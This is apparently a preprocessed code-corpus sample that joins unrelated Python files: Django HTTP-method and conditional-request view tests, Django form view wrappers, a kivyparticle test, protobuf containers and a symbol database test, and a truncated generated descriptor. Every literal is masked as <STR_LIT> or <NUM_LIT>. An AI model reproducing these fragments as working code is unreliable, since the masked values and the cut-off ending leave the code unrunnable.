= "<STR_LIT>" , <EOL> status_code = <NUM_LIT> ) <EOL> class RequireSafeTestCase ( base . TestCase ) : <EOL> """<STR_LIT>""" <EOL> view_classes = ( http . RequireSafe , generic . View , ) <EOL> def test_get_allowed ( self ) : <EOL> """<STR_LIT>""" <EOL> content = self . unique ( ) <EOL> self . assertViewBehavior ( <EOL> { "<STR_LIT>" : content } , <EOL> status_code = <NUM_LIT:200> , <EOL> content = content ) <EOL> def test_head_denied ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertViewBehavior ( <EOL> { "<STR_LIT>" : self . unique ( ) } , <EOL> method = "<STR_LIT>" , <EOL> status_code = <NUM_LIT:200> , <EOL> content = "<STR_LIT>" ) <EOL> def test_options_denied ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertViewBehavior ( <EOL> { "<STR_LIT>" : self . unique ( ) } , <EOL> method = "<STR_LIT>" , <EOL> status_code = <NUM_LIT> ) <EOL> def test_post_denied ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertViewBehavior ( <EOL> { "<STR_LIT>" : self . unique ( ) } , <EOL> method = "<STR_LIT>" , <EOL> status_code = <NUM_LIT> ) <EOL> def test_put_denied ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertViewBehavior ( <EOL> { "<STR_LIT>" : self . unique ( ) } , <EOL> method = "<STR_LIT>" , <EOL> status_code = <NUM_LIT> ) <EOL> def test_delete_denied ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertViewBehavior ( <EOL> { "<STR_LIT>" : self . unique ( ) } , <EOL> method = "<STR_LIT>" , <EOL> status_code = <NUM_LIT> ) <EOL> class ConditionTestCase ( base . TestCase ) : <EOL> """<STR_LIT>""" <EOL> view_classes = ( http . Condition , generic . View , ) <EOL> def test_etag ( self ) : <EOL> """<STR_LIT>""" <EOL> etag = self . unique ( ) <EOL> content = self . unique ( ) <EOL> def condition_etag ( self , request , * args , ** kwargs ) : <EOL> return etag <EOL> self . assertViewBehavior ( <EOL> { "<STR_LIT>" : condition_etag , "<STR_LIT>" : content } , <EOL> status_code = <NUM_LIT:200> , <EOL> content = content , <EOL> headers_exact = { "<STR_LIT>" : self . format_etag ( etag ) } ) <EOL> def test_etag_precedence ( self ) : <EOL> """<STR_LIT>""" <EOL> etag = self . unique ( ) <EOL> def condition_etag ( self , request , * args , ** kwargs ) : <EOL> return etag <EOL> self . assertViewBehavior ( <EOL> { "<STR_LIT>" : condition_etag } , <EOL> status_code = <NUM_LIT> , <EOL> headers_exclude = "<STR_LIT>" ) <EOL> def test_etag_match_not_modified ( self ) : <EOL> """<STR_LIT>""" <EOL> etag = self . unique ( ) <EOL> def condition_etag ( self , request , * args , ** kwargs ) : <EOL> return etag <EOL> self . assertViewBehavior ( <EOL> { "<STR_LIT>" : condition_etag , "<STR_LIT>" : self . unique ( ) } , <EOL> headers = { "<STR_LIT>" : self . format_etag ( etag ) } , <EOL> status_code = <NUM_LIT> , <EOL> content = "<STR_LIT>" , <EOL> headers_exact = { "<STR_LIT>" : self . format_etag ( etag ) } ) <EOL> def test_etag_match_precdence ( self ) : <EOL> """<STR_LIT>""" <EOL> etag = self . unique ( ) <EOL> def condition_etag ( self , request , * args , ** kwargs ) : <EOL> return etag <EOL> self . assertViewBehavior ( <EOL> { "<STR_LIT>" : condition_etag } , <EOL> headers = { "<STR_LIT>" : self . format_etag ( etag ) } , <EOL> status_code = <NUM_LIT> , <EOL> headers_exclude = "<STR_LIT>" ) <EOL> def test_etag_fail ( self ) : <EOL> """<STR_LIT>""" <EOL> etag = self . unique ( ) <EOL> def condition_etag ( self , request , * args , ** kwargs ) : <EOL> return etag <EOL> self . assertViewBehavior ( <EOL> { "<STR_LIT>" : condition_etag , "<STR_LIT>" : self . unique ( ) } , <EOL> headers = { "<STR_LIT>" : self . format_etag ( self . unique ( ) ) } , <EOL> status_code = <NUM_LIT> , <EOL> headers_exact = { "<STR_LIT>" : self . format_etag ( etag ) } ) <EOL> def test_etag_fail_precedence ( self ) : <EOL> """<STR_LIT>""" <EOL> etag = self . unique ( ) <EOL> def condition_etag ( self , request , * args , ** kwargs ) : <EOL> return etag <EOL> self . assertViewBehavior ( <EOL> { "<STR_LIT>" : condition_etag } , <EOL> headers = { "<STR_LIT>" : self . format_etag ( self . unique ( ) ) } , <EOL> status_code = <NUM_LIT> , <EOL> headers_exclude = "<STR_LIT>" ) <EOL> def test_etag_miss ( self ) : <EOL> """<STR_LIT>""" <EOL> etag = self . unique ( ) <EOL> content = self . unique ( ) <EOL> def condition_etag ( self , request , * args , ** kwargs ) : <EOL> return etag <EOL> self . assertViewBehavior ( <EOL> { "<STR_LIT>" : condition_etag , "<STR_LIT>" : content } , <EOL> headers = { "<STR_LIT>" : self . format_etag ( self . unique ( ) ) } , <EOL> status_code = <NUM_LIT:200> , <EOL> content = content , <EOL> headers_exact = { "<STR_LIT>" : self . format_etag ( etag ) } ) <EOL> def test_etag_miss_precedence ( self ) : <EOL> """<STR_LIT>""" <EOL> etag = self . unique ( ) <EOL> def condition_etag ( self , request , * args , ** kwargs ) : <EOL> return etag <EOL> self . assertViewBehavior ( <EOL> { "<STR_LIT>" : condition_etag } , <EOL> headers = { "<STR_LIT>" : self . format_etag ( self . unique ( ) ) } , <EOL> status_code = <NUM_LIT> , <EOL> headers_exclude = "<STR_LIT>" ) <EOL> def test_last_modified ( self ) : <EOL> """<STR_LIT>""" <EOL> last_modified = datetime . datetime . now ( ) <EOL> content = self . unique ( ) <EOL> def condition_last_modified ( self , request , * args , ** kwargs ) : <EOL> return last_modified <EOL> self . assertViewBehavior ( { <EOL> "<STR_LIT>" : condition_last_modified , <EOL> "<STR_LIT>" : content } , <EOL> status_code = <NUM_LIT:200> , <EOL> content = content , <EOL> headers_exact = { <EOL> "<STR_LIT>" : self . format_datetime ( last_modified ) } ) <EOL> def test_last_modified_precedence ( self ) : <EOL> """<STR_LIT>""" <EOL> last_modified = datetime . datetime . now ( ) <EOL> def condition_last_modified ( self , request , * args , ** kwargs ) : <EOL> return last_modified <EOL> self . assertViewBehavior ( <EOL> { "<STR_LIT>" : condition_last_modified } , <EOL> status_code = <NUM_LIT> , <EOL> headers_exclude = "<STR_LIT>" ) <EOL> def test_last_modified_match_not_modified ( self ) : <EOL> """<STR_LIT>""" <EOL> last_modified = datetime . datetime . now ( ) <EOL> def condition_last_modified ( self , request , * args , ** kwargs ) : <EOL> return last_modified <EOL> self . assertViewBehavior ( { <EOL> "<STR_LIT>" : condition_last_modified , <EOL> "<STR_LIT>" : self . unique ( ) } , <EOL> headers = { <EOL> "<STR_LIT>" : <EOL> self . format_datetime ( <EOL> last_modified + datetime . timedelta ( hours = <NUM_LIT:1> ) ) } , <EOL> status_code = <NUM_LIT> , <EOL> headers_exact = { <EOL> "<STR_LIT>" : self . format_datetime ( last_modified ) } ) <EOL> def test_last_modified_match_precedence ( self ) : <EOL> """<STR_LIT>""" <EOL> last_modified = datetime . datetime . now ( ) <EOL> def condition_last_modified ( self , request , * args , ** kwargs ) : <EOL> return last_modified <EOL> self . assertViewBehavior ( <EOL> { "<STR_LIT>" : condition_last_modified } , <EOL> headers = { <EOL> "<STR_LIT>" : <EOL> self . format_datetime ( <EOL> last_modified + datetime . timedelta ( hours = <NUM_LIT:1> ) ) } , <EOL> status_code = <NUM_LIT> , <EOL> headers_exclude = "<STR_LIT>" ) <EOL> def test_last_modified_miss ( self ) : <EOL> """<STR_LIT>""" <EOL> last_modified = datetime . datetime . now ( ) <EOL> content = self . unique ( ) <EOL> def condition_last_modified ( self , request , * args , ** kwargs ) : <EOL> return last_modified + datetime . timedelta ( hours = <NUM_LIT:1> ) <EOL> self . assertViewBehavior ( { <EOL> "<STR_LIT>" : condition_last_modified , <EOL> "<STR_LIT>" : content } , <EOL> headers = { <EOL> "<STR_LIT>" : self . format_datetime ( last_modified ) } , <EOL> status_code = <NUM_LIT:200> , <EOL> content = content , <EOL> headers_exact = { <EOL> "<STR_LIT>" : <EOL> self . format_datetime ( <EOL> last_modified + datetime . timedelta ( hours = <NUM_LIT:1> ) ) } ) <EOL> def test_last_modified_miss_precedence ( self ) : <EOL> """<STR_LIT>""" <EOL> last_modified = datetime . datetime . now ( ) <EOL> def condition_last_modified ( self , request , * args , ** kwargs ) : <EOL> return last_modified + datetime . timedelta ( hours = <NUM_LIT:1> ) <EOL> self . assertViewBehavior ( <EOL> { "<STR_LIT>" : condition_last_modified } , <EOL> headers = { <EOL> "<STR_LIT>" : self . format_datetime ( last_modified ) } , <EOL> status_code = <NUM_LIT> , <EOL> headers_exclude = "<STR_LIT>" ) </s>
<s> from __future__ import unicode_literals <EOL> from django . views import generic <EOL> from . base import View <EOL> __all__ = ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , ) <EOL> class FormView ( generic . FormView , View ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class CreateView ( generic . CreateView , View ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class UpdateView ( generic . UpdateView , View ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class DeleteView ( generic . DeleteView , View ) : <EOL> """<STR_LIT>""" <EOL> pass </s>
<s> from kivyparticle import ParticleSystem <EOL> from kivy . graphics . opengl import GL_ONE , GL_SRC_ALPHA <EOL> import unittest <EOL> import math <EOL> class TestParticleSystem ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . s = ParticleSystem ( '<STR_LIT>' ) <EOL> def test_config ( self ) : <EOL> self . assertEquals ( ( <NUM_LIT:32> , <NUM_LIT:32> ) , self . s . texture . size ) <EOL> self . assertEquals ( <NUM_LIT> , self . s . emitter_x ) <EOL> self . assertEquals ( <NUM_LIT> , self . s . emitter_y ) <EOL> self . assertEquals ( <NUM_LIT> , self . s . emitter_x_variance ) <EOL> self . assertEquals ( <NUM_LIT> , self . s . emitter_y_variance ) <EOL> self . assertEquals ( <NUM_LIT> , self . s . gravity_x ) <EOL> self . assertEquals ( <NUM_LIT> , self . s . gravity_y ) <EOL> self . assertEquals ( <NUM_LIT:0> , self . s . emitter_type ) <EOL> self . assertEquals ( <NUM_LIT> , self . s . max_num_particles ) <EOL> self . assertEquals ( <NUM_LIT> , self . s . life_span ) <EOL> self . assertEquals ( <NUM_LIT> , self . s . life_span_variance ) <EOL> self . assertEquals ( <NUM_LIT> , self . s . start_size ) <EOL> self . assertEquals ( <NUM_LIT> , self . s . start_size_variance ) <EOL> self . assertEquals ( <NUM_LIT> , self . s . end_size ) <EOL> self . assertEquals ( <NUM_LIT:0.0> , self . s . end_size_variance ) <EOL> self . assertEquals ( math . radians ( <NUM_LIT> ) , self . s . emit_angle ) <EOL> self . assertEquals ( math . radians ( <NUM_LIT> ) , self . s . emit_angle_variance ) <EOL> self . assertEquals ( <NUM_LIT:0.0> , self . s . start_rotation ) <EOL> self . assertEquals ( <NUM_LIT:0.0> , self . s . start_rotation_variance ) <EOL> self . assertEquals ( <NUM_LIT:0.0> , self . s . end_rotation ) <EOL> self . assertEquals ( <NUM_LIT:0.0> , self . s . end_rotation_variance ) <EOL> self . assertEquals ( <NUM_LIT> , self . s . speed ) <EOL> self . assertEquals ( <NUM_LIT> , self . s . speed_variance ) <EOL> self . assertEquals ( <NUM_LIT:0.0> , self . s . radial_acceleration ) <EOL> self . assertEquals ( <NUM_LIT:0.0> , self . s . radial_acceleration_variance ) <EOL> self . assertEquals ( <NUM_LIT:0.0> , self . s . tangential_acceleration ) <EOL> self . assertEquals ( <NUM_LIT:0.0> , self . s . tangential_acceleration_variance ) <EOL> self . assertEquals ( <NUM_LIT> , self . s . max_radius ) <EOL> self . assertEquals ( <NUM_LIT:0.0> , self . s . max_radius_variance ) <EOL> self . assertEquals ( <NUM_LIT:0.0> , self . s . min_radius ) <EOL> self . assertEquals ( <NUM_LIT:0.0> , self . s . rotate_per_second ) <EOL> self . assertEquals ( <NUM_LIT:0.0> , self . s . rotate_per_second_variance ) <EOL> self . assertEquals ( [ <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT> ] , self . s . start_color ) <EOL> self . assertEquals ( [ <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ] , self . s . start_color_variance ) <EOL> self . assertEquals ( [ <NUM_LIT:1.0> , <NUM_LIT> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ] , self . s . end_color ) <EOL> self . assertEquals ( [ <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT:0.0> ] , self . s . end_color_variance ) <EOL> self . assertEquals ( GL_SRC_ALPHA , self . s . blend_factor_source ) <EOL> self . assertEquals ( GL_ONE , self . s . blend_factor_dest ) </s>
<s> """<STR_LIT>""" <EOL> __author__ = '<STR_LIT>' <EOL> import collections <EOL> import sys <EOL> if sys . version_info [ <NUM_LIT:0> ] < <NUM_LIT:3> : <EOL> class Mapping ( object ) : <EOL> __slots__ = ( ) <EOL> def get ( self , key , default = None ) : <EOL> try : <EOL> return self [ key ] <EOL> except KeyError : <EOL> return default <EOL> def __contains__ ( self , key ) : <EOL> try : <EOL> self [ key ] <EOL> except KeyError : <EOL> return False <EOL> else : <EOL> return True <EOL> def iterkeys ( self ) : <EOL> return iter ( self ) <EOL> def itervalues ( self ) : <EOL> for key in self : <EOL> yield self [ key ] <EOL> def iteritems ( self ) : <EOL> for key in self : <EOL> yield ( key , self [ key ] ) <EOL> def keys ( self ) : <EOL> return list ( self ) <EOL> def items ( self ) : <EOL> return [ ( key , self [ key ] ) for key in self ] <EOL> def values ( self ) : <EOL> return [ self [ key ] for key in self ] <EOL> __hash__ = None <EOL> def __eq__ ( self , other ) : <EOL> if not isinstance ( other , collections . Mapping ) : <EOL> return NotImplemented <EOL> return dict ( list ( self . items ( ) ) ) == dict ( list ( other . items ( ) ) ) <EOL> def __ne__ ( self , other ) : <EOL> return not ( self == other ) <EOL> class MutableMapping ( Mapping ) : <EOL> __slots__ = ( ) <EOL> __marker = object ( ) <EOL> def pop ( self , key , default = __marker ) : <EOL> try : <EOL> value = self [ key ] <EOL> except KeyError : <EOL> if default is self . __marker : <EOL> raise <EOL> return default <EOL> else : <EOL> del self [ key ] <EOL> return value <EOL> def popitem ( self ) : <EOL> try : <EOL> key = next ( iter ( self ) ) <EOL> except StopIteration : <EOL> raise KeyError <EOL> value = self [ key ] <EOL> del self [ key ] <EOL> return key , value <EOL> def clear ( self ) : <EOL> try : <EOL> while True : <EOL> self . popitem ( ) <EOL> except KeyError : <EOL> pass <EOL> def update ( * args , ** kwds ) : <EOL> if len ( args ) > <NUM_LIT:2> : <EOL> raise TypeError ( "<STR_LIT>" <EOL> "<STR_LIT>" . format ( len ( args ) ) ) <EOL> elif not args : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> self = args [ <NUM_LIT:0> ] <EOL> other = args [ <NUM_LIT:1> ] if len ( args ) >= <NUM_LIT:2> else ( ) <EOL> if isinstance ( other , Mapping ) : <EOL> for key in other : <EOL> self [ key ] = other [ key ] <EOL> elif hasattr ( other , "<STR_LIT>" ) : <EOL> for key in list ( other . keys ( ) ) : <EOL> self [ key ] = other [ key ] <EOL> else : <EOL> for key , value in other : <EOL> self [ key ] = value <EOL> for key , value in list ( kwds . items ( ) ) : <EOL> self [ key ] = value <EOL> def setdefault ( self , key , default = None ) : <EOL> try : <EOL> return self [ key ] <EOL> except KeyError : <EOL> self [ key ] = default <EOL> return default <EOL> collections . Mapping . register ( Mapping ) <EOL> collections . MutableMapping . register ( MutableMapping ) <EOL> else : <EOL> MutableMapping = collections . MutableMapping <EOL> class BaseContainer ( object ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> def __init__ ( self , message_listener ) : <EOL> """<STR_LIT>""" <EOL> self . _message_listener = message_listener <EOL> self . _values = [ ] <EOL> def __getitem__ ( self , key ) : <EOL> """<STR_LIT>""" <EOL> return self . _values [ key ] <EOL> def __len__ ( self ) : <EOL> """<STR_LIT>""" <EOL> return len ( self . _values ) <EOL> def __ne__ ( self , other ) : <EOL> """<STR_LIT>""" <EOL> return not self == other <EOL> def __hash__ ( self ) : <EOL> raise TypeError ( '<STR_LIT>' ) <EOL> def __repr__ ( self ) : <EOL> return repr ( self . _values ) <EOL> def sort ( self , * args , ** kwargs ) : <EOL> if '<STR_LIT>' in kwargs : <EOL> kwargs [ '<STR_LIT>' ] = kwargs . pop ( '<STR_LIT>' ) <EOL> self . _values . sort ( * args , ** kwargs ) <EOL> class RepeatedScalarFieldContainer ( BaseContainer ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = [ '<STR_LIT>' ] <EOL> def __init__ ( self , message_listener , type_checker ) : <EOL> """<STR_LIT>""" <EOL> super ( RepeatedScalarFieldContainer , self ) . __init__ ( message_listener ) <EOL> self . _type_checker = type_checker <EOL> def append ( self , value ) : <EOL> """<STR_LIT>""" <EOL> self . _values . append ( self . _type_checker . CheckValue ( value ) ) <EOL> if not self . _message_listener . dirty : <EOL> self . _message_listener . Modified ( ) <EOL> def insert ( self , key , value ) : <EOL> """<STR_LIT>""" <EOL> self . _values . insert ( key , self . _type_checker . CheckValue ( value ) ) <EOL> if not self . _message_listener . dirty : <EOL> self . _message_listener . Modified ( ) <EOL> def extend ( self , elem_seq ) : <EOL> """<STR_LIT>""" <EOL> if elem_seq is None : <EOL> return <EOL> try : <EOL> elem_seq_iter = iter ( elem_seq ) <EOL> except TypeError : <EOL> if not elem_seq : <EOL> return <EOL> raise <EOL> new_values = [ self . _type_checker . CheckValue ( elem ) for elem in elem_seq_iter ] <EOL> if new_values : <EOL> self . _values . extend ( new_values ) <EOL> self . _message_listener . Modified ( ) <EOL> def MergeFrom ( self , other ) : <EOL> """<STR_LIT>""" <EOL> self . _values . extend ( other . _values ) <EOL> self . _message_listener . Modified ( ) <EOL> def remove ( self , elem ) : <EOL> """<STR_LIT>""" <EOL> self . _values . remove ( elem ) <EOL> self . _message_listener . Modified ( ) <EOL> def pop ( self , key = - <NUM_LIT:1> ) : <EOL> """<STR_LIT>""" <EOL> value = self . _values [ key ] <EOL> self . __delitem__ ( key ) <EOL> return value <EOL> def __setitem__ ( self , key , value ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( key , slice ) : <EOL> if key . step is not None : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> self . __setslice__ ( key . start , key . stop , value ) <EOL> else : <EOL> self . _values [ key ] = self . _type_checker . CheckValue ( value ) <EOL> self . _message_listener . Modified ( ) <EOL> def __getslice__ ( self , start , stop ) : <EOL> """<STR_LIT>""" <EOL> return self . _values [ start : stop ] <EOL> def __setslice__ ( self , start , stop , values ) : <EOL> """<STR_LIT>""" <EOL> new_values = [ ] <EOL> for value in values : <EOL> new_values . append ( self . _type_checker . CheckValue ( value ) ) <EOL> self . _values [ start : stop ] = new_values <EOL> self . _message_listener . Modified ( ) <EOL> def __delitem__ ( self , key ) : <EOL> """<STR_LIT>""" <EOL> del self . _values [ key ] <EOL> self . _message_listener . Modified ( ) <EOL> def __delslice__ ( self , start , stop ) : <EOL> """<STR_LIT>""" <EOL> del self . _values [ start : stop ] <EOL> self . _message_listener . Modified ( ) <EOL> def __eq__ ( self , other ) : <EOL> """<STR_LIT>""" <EOL> if self is other : <EOL> return True <EOL> if isinstance ( other , self . __class__ ) : <EOL> return other . _values == self . _values <EOL> return other == self . _values <EOL> collections . MutableSequence . register ( BaseContainer ) <EOL> class RepeatedCompositeFieldContainer ( BaseContainer ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = [ '<STR_LIT>' ] <EOL> def __init__ ( self , message_listener , message_descriptor ) : <EOL> """<STR_LIT>""" <EOL> super ( RepeatedCompositeFieldContainer , self ) . __init__ ( message_listener ) <EOL> self . _message_descriptor = message_descriptor <EOL> def add ( self , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> new_element = self . _message_descriptor . _concrete_class ( ** kwargs ) <EOL> new_element . _SetListener ( self . _message_listener ) <EOL> self . _values . append ( new_element ) <EOL> if not self . _message_listener . dirty : <EOL> self . _message_listener . Modified ( ) <EOL> return new_element <EOL> def extend ( self , elem_seq ) : <EOL> """<STR_LIT>""" <EOL> message_class = self . _message_descriptor . _concrete_class <EOL> listener = self . _message_listener <EOL> values = self . _values <EOL> for message in elem_seq : <EOL> new_element = message_class ( ) <EOL> new_element . _SetListener ( listener ) <EOL> new_element . MergeFrom ( message ) <EOL> values . append ( new_element ) <EOL> listener . Modified ( ) <EOL> def MergeFrom ( self , other ) : <EOL> """<STR_LIT>""" <EOL> self . extend ( other . _values ) <EOL> def remove ( self , elem ) : <EOL> """<STR_LIT>""" <EOL> self . _values . remove ( elem ) <EOL> self . _message_listener . Modified ( ) <EOL> def pop ( self , key = - <NUM_LIT:1> ) : <EOL> """<STR_LIT>""" <EOL> value = self . _values [ key ] <EOL> self . __delitem__ ( key ) <EOL> return value <EOL> def __getslice__ ( self , start , stop ) : <EOL> """<STR_LIT>""" <EOL> return self . _values [ start : stop ] <EOL> def __delitem__ ( self , key ) : <EOL> """<STR_LIT>""" <EOL> del self . _values [ key ] <EOL> self . _message_listener . Modified ( ) <EOL> def __delslice__ ( self , start , stop ) : <EOL> """<STR_LIT>""" <EOL> del self . _values [ start : stop ] <EOL> self . _message_listener . Modified ( ) <EOL> def __eq__ ( self , other ) : <EOL> """<STR_LIT>""" <EOL> if self is other : <EOL> return True <EOL> if not isinstance ( other , self . __class__ ) : <EOL> raise TypeError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> return self . _values == other . _values <EOL> class ScalarMap ( MutableMapping ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> def __init__ ( self , message_listener , key_checker , value_checker ) : <EOL> """<STR_LIT>""" <EOL> self . _message_listener = message_listener <EOL> self . _key_checker = key_checker <EOL> self . _value_checker = value_checker <EOL> self . _values = { } <EOL> def __getitem__ ( self , key ) : <EOL> try : <EOL> return self . _values [ key ] <EOL> except KeyError : <EOL> key = self . _key_checker . CheckValue ( key ) <EOL> val = self . _value_checker . DefaultValue ( ) <EOL> self . _values [ key ] = val <EOL> return val <EOL> def __contains__ ( self , item ) : <EOL> return item in self . _values <EOL> def get ( self , key , default = None ) : <EOL> if key in self : <EOL> return self [ key ] <EOL> else : <EOL> return default <EOL> def __setitem__ ( self , key , value ) : <EOL> checked_key = self . _key_checker . CheckValue ( key ) <EOL> checked_value = self . _value_checker . CheckValue ( value ) <EOL> self . _values [ checked_key ] = checked_value <EOL> self . _message_listener . Modified ( ) <EOL> def __delitem__ ( self , key ) : <EOL> del self . _values [ key ] <EOL> self . _message_listener . Modified ( ) <EOL> def __len__ ( self ) : <EOL> return len ( self . _values ) <EOL> def __iter__ ( self ) : <EOL> return iter ( self . _values ) <EOL> def MergeFrom ( self , other ) : <EOL> self . _values . update ( other . _values ) <EOL> self . _message_listener . Modified ( ) <EOL> def clear ( self ) : <EOL> self . _values . clear ( ) <EOL> self . _message_listener . Modified ( ) <EOL> class MessageMap ( MutableMapping ) : <EOL> """<STR_LIT>""" <EOL> __slots__ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> def __init__ ( self , message_listener , message_descriptor , key_checker ) : <EOL> """<STR_LIT>""" <EOL> self . _message_listener = message_listener <EOL> self . _message_descriptor = message_descriptor <EOL> self . _key_checker = key_checker <EOL> self . _values = { } <EOL> def __getitem__ ( self , key ) : <EOL> try : <EOL> return self . _values [ key ] <EOL> except KeyError : <EOL> key = self . _key_checker . CheckValue ( key ) <EOL> new_element = self . _message_descriptor . _concrete_class ( ) <EOL> new_element . _SetListener ( self . _message_listener ) <EOL> self . _values [ key ] = new_element <EOL> self . _message_listener . Modified ( ) <EOL> return new_element <EOL> def get_or_create ( self , key ) : <EOL> """<STR_LIT>""" <EOL> return self [ key ] <EOL> def get ( self , key , default = None ) : <EOL> if key in self : <EOL> return self [ key ] <EOL> else : <EOL> return default <EOL> def __contains__ ( self , item ) : <EOL> return item in self . _values <EOL> def __setitem__ ( self , key , value ) : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> def __delitem__ ( self , key ) : <EOL> del self . _values [ key ] <EOL> self . _message_listener . Modified ( ) <EOL> def __len__ ( self ) : <EOL> return len ( self . _values ) <EOL> def __iter__ ( self ) : <EOL> return iter ( self . _values ) <EOL> def MergeFrom ( self , other ) : <EOL> for key in other : <EOL> self [ key ] . MergeFrom ( other [ key ] ) <EOL> def clear ( self ) : <EOL> self . _values . clear ( ) <EOL> self . _message_listener . Modified ( ) </s>
<s> """<STR_LIT>""" <EOL> try : <EOL> import unittest2 as unittest <EOL> except ImportError : <EOL> import unittest <EOL> from google . protobuf import unittest_pb2 <EOL> from google . protobuf import symbol_database <EOL> class SymbolDatabaseTest ( unittest . TestCase ) : <EOL> def _Database ( self ) : <EOL> db = symbol_database . SymbolDatabase ( ) <EOL> db . RegisterFileDescriptor ( unittest_pb2 . DESCRIPTOR ) <EOL> db . RegisterMessage ( unittest_pb2 . TestAllTypes ) <EOL> db . RegisterMessage ( unittest_pb2 . TestAllTypes . NestedMessage ) <EOL> db . RegisterMessage ( unittest_pb2 . TestAllTypes . OptionalGroup ) <EOL> db . RegisterMessage ( unittest_pb2 . TestAllTypes . RepeatedGroup ) <EOL> db . RegisterEnumDescriptor ( unittest_pb2 . ForeignEnum . DESCRIPTOR ) <EOL> db . RegisterEnumDescriptor ( unittest_pb2 . TestAllTypes . NestedEnum . DESCRIPTOR ) <EOL> return db <EOL> def testGetPrototype ( self ) : <EOL> instance = self . _Database ( ) . GetPrototype ( <EOL> unittest_pb2 . TestAllTypes . DESCRIPTOR ) <EOL> self . assertTrue ( instance is unittest_pb2 . TestAllTypes ) <EOL> def testGetMessages ( self ) : <EOL> messages = self . _Database ( ) . GetMessages ( <EOL> [ '<STR_LIT>' ] ) <EOL> self . assertTrue ( <EOL> unittest_pb2 . TestAllTypes is <EOL> messages [ '<STR_LIT>' ] ) <EOL> def testGetSymbol ( self ) : <EOL> self . assertEqual ( <EOL> unittest_pb2 . TestAllTypes , self . _Database ( ) . GetSymbol ( <EOL> '<STR_LIT>' ) ) <EOL> self . assertEqual ( <EOL> unittest_pb2 . TestAllTypes . NestedMessage , self . _Database ( ) . GetSymbol ( <EOL> '<STR_LIT>' ) ) <EOL> self . assertEqual ( <EOL> unittest_pb2 . TestAllTypes . OptionalGroup , self . _Database ( ) . GetSymbol ( <EOL> '<STR_LIT>' ) ) <EOL> self . assertEqual ( <EOL> unittest_pb2 . TestAllTypes . RepeatedGroup , self . _Database ( ) . GetSymbol ( <EOL> '<STR_LIT>' ) ) <EOL> def testEnums ( self ) : <EOL> self . assertEqual ( <EOL> '<STR_LIT>' , <EOL> self . _Database ( ) . pool . FindEnumTypeByName ( <EOL> '<STR_LIT>' ) . full_name ) <EOL> self . assertEqual ( <EOL> '<STR_LIT>' , <EOL> self . _Database ( ) . pool . FindEnumTypeByName ( <EOL> '<STR_LIT>' ) . full_name ) <EOL> def testFindMessageTypeByName ( self ) : <EOL> self . assertEqual ( <EOL> '<STR_LIT>' , <EOL> self . _Database ( ) . pool . FindMessageTypeByName ( <EOL> '<STR_LIT>' ) . full_name ) <EOL> self . assertEqual ( <EOL> '<STR_LIT>' , <EOL> self . _Database ( ) . pool . FindMessageTypeByName ( <EOL> '<STR_LIT>' ) . full_name ) <EOL> def testFindFindContainingSymbol ( self ) : <EOL> self . assertEqual ( <EOL> '<STR_LIT>' , <EOL> self . _Database ( ) . pool . FindFileContainingSymbol ( <EOL> '<STR_LIT>' ) . name ) <EOL> self . assertEqual ( <EOL> '<STR_LIT>' , <EOL> self . _Database ( ) . pool . FindFileContainingSymbol ( <EOL> '<STR_LIT>' ) . name ) <EOL> def testFindFileByName ( self ) : <EOL> self . assertEqual ( <EOL> '<STR_LIT>' , <EOL> self . _Database ( ) . pool . FindFileByName ( <EOL> '<STR_LIT>' ) . name ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> from google . protobuf import descriptor as _descriptor <EOL> from google . protobuf import message as _message <EOL> from google . protobuf import reflection as _reflection <EOL> from google . protobuf import symbol_database as _symbol_database <EOL> from google . protobuf import descriptor_pb2 <EOL> _sym_db = _symbol_database . Default ( ) <EOL> DESCRIPTOR = _descriptor . FileDescriptor ( <EOL> name = '<STR_LIT>' , <EOL> package = '<STR_LIT>' , <EOL> syntax = '<STR_LIT>' , <EOL> serialized_pb = b'<STR_LIT>' <EOL> ) <EOL> _sym_db . RegisterFileDescriptor ( DESCRIPTOR ) <EOL> _IMPORTNOARENANESTEDMESSAGE = _descriptor . Descriptor ( <EOL> name = '<STR_LIT>' , <EOL> full_name = '<STR_LIT>' , <EOL> filename = None , <EOL> file = DESCRIPTOR , <EOL> containing_type = None , <EOL> fields = [ <EOL> _descriptor . FieldDescriptor ( <EOL> name = '<STR_LIT:d>' , full_name = '<STR_LIT>' , index = <NUM_LIT:0> , <EOL> number = <NUM_LIT:1> , type = <NUM_LIT:5> , cpp_type = <NUM_LIT:1> , label = <NUM_LIT:1> , <EOL> has_default_value = False , default_value = <NUM_LIT:0> , <EOL> message_type = None , enum_type = None , containing_type = None , <EOL> is_extension = False , extension_scope = None , <EOL> options = None ) , <EOL> ] , <EOL> extensions = [ <EOL> ] , <EOL> nested_types = [ ] , <EOL> enum_types = [ <EOL> ] , <EOL> options = None , <EOL> is_extendable = False , <EOL> syntax = '<STR_LIT>' , <EOL> extension_ranges = [ ] , <EOL> 